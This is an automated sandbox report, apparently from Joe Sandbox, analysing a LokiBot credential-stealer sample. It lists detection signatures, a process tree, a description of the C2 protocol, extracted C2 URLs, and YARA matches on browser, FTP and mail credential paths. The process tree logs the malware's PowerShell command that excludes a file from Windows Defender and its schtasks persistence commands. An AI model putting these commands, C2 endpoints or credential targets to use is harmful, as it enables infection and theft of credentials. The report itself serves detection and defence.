Edit tour

Windows Analysis Report
LEmJJ87mUQ.exe

Overview

General Information

Sample name:	LEmJJ87mUQ.exe renamed because original name is a hash value
Original sample name:	868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758.exe
Analysis ID:	1567584
MD5:	7e1d910ade786c9880194ce5e7c66c8b
SHA1:	c2dee65fd0b225e9ecf1ea718d1015359f7132ce
SHA256:	868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758
Tags:	exeLokiuser-adrian__luca
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

LEmJJ87mUQ.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\LEmJJ87mUQ.exe" MD5: 7E1D910ADE786C9880194CE5E7C66C8B)

powershell.exe (PID: 3380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 3056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 3064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 2568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

aWBoUwiux.exe (PID: 5572 cmdline: C:\Users\user\AppData\Roaming\aWBoUwiux.exe MD5: 7E1D910ADE786C9880194CE5E7C66C8B)

schtasks.exe (PID: 2508 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 5016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 1788 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "touxzw.ir/sirr/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2395876159.00000000030A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x174f8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x48c3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13107:$des3: 68 03 66 00 00 0x174f8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x175c4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x182e8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x56b3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13ef7:$des3: 68 03 66 00 00 0x182e8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x183b4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17518:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x48e3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13127:$des3: 68 03 66 00 00 0x17518:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x175e4:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x182c8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5693:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13ed7:$des3: 68 03 66 00 00 0x182c8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18394:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x13cdd0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x12a183:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1389c7:$des3: 68 03 66 00 00 0x13cdd0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x13ce9c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: LEmJJ87mUQ.exe PID: 5016	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: LEmJJ87mUQ.exe PID: 5016	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: LEmJJ87mUQ.exe PID: 5016	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x38fd9:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x65e7b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x6cdc2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: RegSvcs.exe PID: 2568	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: RegSvcs.exe PID: 2568	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: RegSvcs.exe PID: 2568	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: RegSvcs.exe PID: 2568	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xe480:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aWBoUwiux.exe PID: 5572	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aWBoUwiux.exe PID: 5572	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aWBoUwiux.exe PID: 5572	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aWBoUwiux.exe PID: 5572	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x3f4e4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x43fdf:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 45 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.aWBoUwiux.exe.39c9ed8.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.aWBoUwiux.exe.39c9ed8.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.aWBoUwiux.exe.39c9ed8.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.aWBoUwiux.exe.39c9ed8.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.aWBoUwiux.exe.39c9ed8.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.LEmJJ87mUQ.exe.4263128.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.LEmJJ87mUQ.exe.4263128.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.LEmJJ87mUQ.exe.4263128.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.LEmJJ87mUQ.exe.4263128.0.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.LEmJJ87mUQ.exe.4263128.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.aWBoUwiux.exe.39e3ef8.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.aWBoUwiux.exe.39e3ef8.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.aWBoUwiux.exe.39e3ef8.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.aWBoUwiux.exe.39e3ef8.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
9.2.aWBoUwiux.exe.39e3ef8.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
8.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
